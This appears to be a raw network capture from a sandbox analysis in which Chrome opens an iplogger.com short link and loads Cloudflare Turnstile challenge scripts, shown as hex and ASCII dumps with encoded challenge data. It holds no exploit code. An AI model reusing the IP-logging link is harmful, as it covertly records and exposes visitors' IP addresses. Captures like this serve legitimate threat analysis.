                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:24 UTC580OUTGET /turnstile/v0/g/ec4b873d446c/api.js?onload=Jeuhg1&render=explicit HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Origin: https://iplogger.com
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:24 UTC441INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:24 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 47262
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                                last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                                                                                                                                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd82818e75de99-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:24 UTC928INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                                Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                                                                                                                                                                                                2024-10-03 14:09:24 UTC1369INData Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44
                                                                                                                                                                                                                                                Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
                                                                                                                                                                                                                                                2024-10-03 14:09:24 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72
                                                                                                                                                                                                                                                Data Ascii: function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
                                                                                                                                                                                                                                                2024-10-03 14:09:24 UTC1369INData Raw: 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c
                                                                                                                                                                                                                                                Data Ascii: oaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(function(e){e.MANAGED="managed",
                                                                                                                                                                                                                                                2024-10-03 14:09:24 UTC1369INData Raw: 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29
                                                                                                                                                                                                                                                Data Ascii: al",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(function(e){e.EXECUTE="execute"})
                                                                                                                                                                                                                                                2024-10-03 14:09:24 UTC1369INData Raw: 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e
                                                                                                                                                                                                                                                Data Ascii: archParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params.
                                                                                                                                                                                                                                                2024-10-03 14:09:24 UTC1369INData Raw: 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 66 21 3d 3d 76 6f 69 64 20 30 3f 66 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29
                                                                                                                                                                                                                                                Data Ascii: ===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&f!==void 0?f:"nonexistent")
                                                                                                                                                                                                                                                2024-10-03 14:09:24 UTC1369INData Raw: 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74
                                                                                                                                                                                                                                                Data Ascii: uct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function(a){return a.__proto__||Object
                                                                                                                                                                                                                                                2024-10-03 14:09:24 UTC1369INData Raw: 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28 72 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72
                                                                                                                                                                                                                                                Data Ascii: flare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(r,HTMLScriptElement)&&e.test(r
                                                                                                                                                                                                                                                2024-10-03 14:09:24 UTC1369INData Raw: 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 73 2e 69 64 3d
                                                                                                                                                                                                                                                Data Ascii: f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className="cf-turnstile-feedback",s.id=


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                9192.168.2.649727172.67.188.1784436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1054OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1787772256:1727962003:iWCRLIu4ZygN5hNL9RXktFOgCDxm7GLFIz5ri-9QP5c/8ccd8274b9e442c9/79895931bf779a4 HTTP/1.1
                                                                                                                                                                                                                                                Host: iplogger.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 1879
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                                                                                                                CF-Challenge: 79895931bf779a4
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://iplogger.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://iplogger.com/1KhnJ4
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1879OUTData Raw: 76 5f 38 63 63 64 38 32 37 34 62 39 65 34 34 32 63 39 3d 31 65 4a 70 69 70 53 70 65 70 4f 70 24 30 56 71 30 56 37 70 48 6d 79 41 52 35 46 48 30 46 70 56 54 4a 56 45 70 4a 4a 67 6f 56 4a 70 43 65 45 43 59 4a 6b 56 39 57 59 4b 48 30 65 30 4f 56 63 70 66 76 43 66 6a 56 67 52 56 4b 31 56 30 43 56 79 57 70 56 43 6a 77 58 70 45 34 56 46 38 57 7a 57 63 4e 66 48 67 25 32 62 56 41 4d 54 45 57 56 58 70 56 42 56 35 4f 6c 54 56 69 51 32 37 44 64 7a 55 74 35 4a 67 53 56 75 46 48 56 46 70 4b 4e 66 4f 41 69 31 62 6f 74 6c 48 42 31 45 47 6e 70 56 62 2d 6a 6b 48 56 57 38 58 56 66 57 2d 67 67 31 4f 56 56 4e 56 30 44 6d 4e 72 4b 41 57 77 56 56 69 56 4b 78 66 31 56 76 6f 55 58 77 43 69 7a 65 56 66 4d 67 39 57 4c 77 52 56 56 63 56 31 6d 56 37 6f 51 6d 56 66 6a 74 68 41 70 56
                                                                                                                                                                                                                                                Data Ascii: v_8ccd8274b9e442c9=1eJpipSpepOp$0Vq0V7pHmyAR5FH0FpVTJVEpJJgoVJpCeECYJkV9WYKH0e0OVcpfvCfjVgRVK1V0CVyWpVCjwXpE4VF8WzWcNfHg%2bVAMTEWVXpVBV5OlTViQ27DdzUt5JgSVuFHVFpKNfOAi1botlHB1EGnpVb-jkHVW8XVfW-gg1OVVNV0DmNrKAWwVViVKxf1VvoUXwCizeVfMg9WLwRVVcV1mV7oQmVfjthApV
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:25 GMT
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 16760
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-chl-gen: l5Kqgea1RepQV68+UJea/2iv8IatLLnU2Uw28TRqIOOjHQFZAw3HH4/vQkrMBgjbVEwpGg2uAA==$yD+/On7TFsnvUyKb
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dNp7dKkm5prnegS45A3rCUs9gUfwKqTAziEgoMv6XeB4RAki4XyrJDOCEUwtueGzsr2XyCA5XEGTT4ex5iXibvKyzWJBEEHhdJoGMwhG3I3Y2itPMuVLdLxVxezO3eg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd82844b570f85-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC758INData Raw: 74 73 48 47 6b 62 7a 48 71 71 75 48 70 4b 4b 37 6b 61 36 51 76 38 50 43 72 71 33 50 77 72 61 78 30 37 2f 48 79 4f 4c 44 6e 4f 44 66 33 4b 58 51 77 63 76 64 75 36 32 32 72 65 44 47 76 72 44 55 34 2b 48 72 34 66 66 4e 39 4e 58 6e 7a 72 33 66 32 65 50 31 30 74 41 43 76 66 62 61 2f 4d 67 41 2b 2f 72 68 45 41 6a 51 35 75 34 4a 30 68 51 4b 44 77 54 78 48 51 38 62 38 4f 6b 64 2b 50 49 44 33 69 54 64 4a 65 45 71 2f 67 7a 6d 34 41 63 63 38 4f 67 45 41 4f 38 4e 42 79 54 34 2b 6a 30 39 2b 50 51 4c 4d 76 77 31 41 54 59 30 4d 6a 30 52 52 77 67 61 44 54 67 76 44 6a 38 71 4e 45 6c 4a 48 78 38 57 53 53 38 33 47 55 78 4d 53 7a 35 67 58 46 77 75 52 46 73 35 52 6b 68 68 50 56 68 69 58 6b 6b 72 62 6b 70 6c 59 54 31 58 55 55 74 46 4e 6b 6c 59 4f 7a 56 54 53 58 61 41 67 30 31
                                                                                                                                                                                                                                                Data Ascii: tsHGkbzHqquHpKK7ka6Qv8PCrq3Pwrax07/HyOLDnODf3KXQwcvdu622reDGvrDU4+Hr4ffN9NXnzr3f2eP10tACvfba/MgA+/rhEAjQ5u4J0hQKDwTxHQ8b8Okd+PID3iTdJeEq/gzm4Acc8OgEAO8NByT4+j09+PQLMvw1ATY0Mj0RRwgaDTgvDj8qNElJHx8WSS83GUxMSz5gXFwuRFs5RkhhPVhiXkkrbkplYT1XUUtFNklYOzVTSXaAg01
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 33 68 31 73 37 38 34 39 48 55 75 64 54 44 32 67 6e 6d 43 50 63 52 37 65 7a 68 32 78 58 6a 35 2f 67 4f 43 68 7a 55 33 42 58 38 32 50 48 76 45 52 58 37 42 43 49 62 35 76 4d 6a 42 51 54 74 43 43 62 69 4d 76 37 75 37 53 6f 69 49 41 4c 33 38 67 73 38 39 7a 51 50 46 54 6b 42 52 50 30 55 52 69 67 56 4d 77 63 6c 42 53 6f 61 4c 53 51 6a 4d 55 34 56 53 46 63 52 4a 78 63 35 52 52 67 59 4b 56 45 71 57 78 6f 34 59 32 4d 65 52 6a 38 6c 62 47 46 49 50 6d 4d 70 4f 30 42 53 5a 57 56 54 56 57 34 76 64 30 34 31 64 31 4a 5a 57 54 74 4f 63 46 46 37 57 31 31 6d 51 46 68 6d 5a 49 46 65 68 31 39 4c 54 6d 4a 72 69 56 36 4c 6b 70 68 30 57 58 61 52 66 6f 2b 54 56 35 6c 32 58 33 31 68 6c 4b 4f 49 64 47 5a 37 5a 32 61 73 6e 33 2b 50 71 71 79 4a 6f 6f 61 73 71 34 2b 73 70 4c 42 36 72
                                                                                                                                                                                                                                                Data Ascii: 3h1s7849HUudTD2gnmCPcR7ezh2xXj5/gOChzU3BX82PHvERX7BCIb5vMjBQTtCCbiMv7u7SoiIAL38gs89zQPFTkBRP0URigVMwclBSoaLSQjMU4VSFcRJxc5RRgYKVEqWxo4Y2MeRj8lbGFIPmMpO0BSZWVTVW4vd041d1JZWTtOcFF7W11mQFhmZIFeh19LTmJriV6Lkph0WXaRfo+TV5l2X31hlKOIdGZ7Z2asn3+PqqyJooasq4+spLB6r
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 34 39 77 6a 34 2b 39 63 46 42 2f 59 52 77 76 45 45 2f 75 54 39 39 65 72 30 30 77 6b 48 48 68 58 31 38 78 4c 63 44 4f 38 4e 46 66 63 46 48 4f 51 69 47 78 30 61 4a 53 6e 6e 36 50 77 50 41 69 37 74 49 76 63 32 38 51 6f 48 2b 30 41 66 4c 68 55 33 45 68 73 55 51 78 34 43 4f 45 77 48 52 6b 51 68 42 67 30 37 53 41 35 4f 55 43 56 4b 57 55 31 45 47 56 64 55 4b 55 74 67 53 31 77 2f 4c 79 51 64 57 31 52 48 53 79 49 73 51 54 35 6f 61 6c 70 6b 5a 46 42 42 64 6e 56 79 57 6c 52 31 65 6a 42 48 61 7a 70 67 67 32 56 54 57 44 35 6f 4f 33 78 2b 53 56 35 4b 69 6f 56 4e 53 70 4f 4a 59 59 78 6a 63 45 2b 58 6a 59 52 6d 58 4a 43 4a 69 33 52 63 62 6e 4a 30 6d 33 78 6b 63 6d 6d 73 71 6f 43 66 66 57 74 75 69 71 4f 6d 66 36 4e 31 65 48 57 47 6b 4c 4f 73 66 4a 4e 38 67 58 32 39 73 33
                                                                                                                                                                                                                                                Data Ascii: 49wj4+9cFB/YRwvEE/uT99er00wkHHhX18xLcDO8NFfcFHOQiGx0aJSnn6PwPAi7tIvc28QoH+0AfLhU3EhsUQx4COEwHRkQhBg07SA5OUCVKWU1EGVdUKUtgS1w/LyQdW1RHSyIsQT5oalpkZFBBdnVyWlR1ejBHazpgg2VTWD5oO3x+SV5KioVNSpOJYYxjcE+XjYRmXJCJi3RcbnJ0m3xkcmmsqoCffWtuiqOmf6N1eHWGkLOsfJN8gX29s3
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 43 64 76 70 33 41 33 65 37 2b 44 79 35 76 45 4c 46 76 67 4b 39 74 67 50 43 41 2f 79 49 74 37 76 47 4f 4d 48 45 2f 50 38 41 50 67 76 46 79 55 43 4a 78 45 68 2f 53 63 59 4e 41 58 34 2b 54 67 61 4b 41 63 35 4f 51 7a 37 4e 77 49 67 46 68 73 49 43 45 4d 4c 52 51 77 67 43 54 78 4c 4c 31 55 73 52 55 70 4c 51 54 55 71 46 79 30 51 4f 6a 5a 67 59 69 4a 54 51 47 64 6e 5a 6a 35 53 59 54 68 74 54 55 35 76 57 6c 73 73 55 6d 70 45 56 6d 6c 48 52 6c 63 37 62 56 57 41 64 46 39 32 59 33 31 35 56 49 52 6a 64 6f 56 66 61 6f 56 4b 65 46 78 73 69 47 74 78 6a 56 4a 32 59 58 57 51 5a 35 71 54 6e 33 4b 41 57 36 42 37 67 5a 79 67 58 33 61 59 5a 58 4f 43 6a 49 53 66 66 4a 75 6f 61 5a 47 31 6f 71 4e 34 65 4b 4f 57 65 70 36 36 74 34 75 41 6c 48 32 41 70 4c 69 38 6f 72 57 79 76 4b 4c
                                                                                                                                                                                                                                                Data Ascii: Cdvp3A3e7+Dy5vELFvgK9tgPCA/yIt7vGOMHE/P8APgvFyUCJxEh/ScYNAX4+TgaKAc5OQz7NwIgFhsICEMLRQwgCTxLL1UsRUpLQTUqFy0QOjZgYiJTQGdnZj5SYThtTU5vWlssUmpEVmlHRlc7bVWAdF92Y315VIRjdoVfaoVKeFxsiGtxjVJ2YXWQZ5qTn3KAW6B7gZygX3aYZXOCjISffJuoaZG1oqN4eKOWep66t4uAlH2ApLi8orWyvKL
